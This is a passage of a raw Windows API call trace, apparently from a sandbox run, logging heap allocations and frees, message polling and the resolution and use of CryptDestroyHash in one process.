| out: hHeap=0x970000) returned 1 [0188.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0188.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0188.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0188.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0188.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0188.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509f8 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0188.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.966] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c80 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.966] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0188.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0188.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0188.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0188.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0188.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0188.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699a8 [0188.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0188.970] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0188.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0188.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.971] CryptDestroyHash (hHash=0xa87550) returned 1 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0188.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0188.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0188.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0188.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 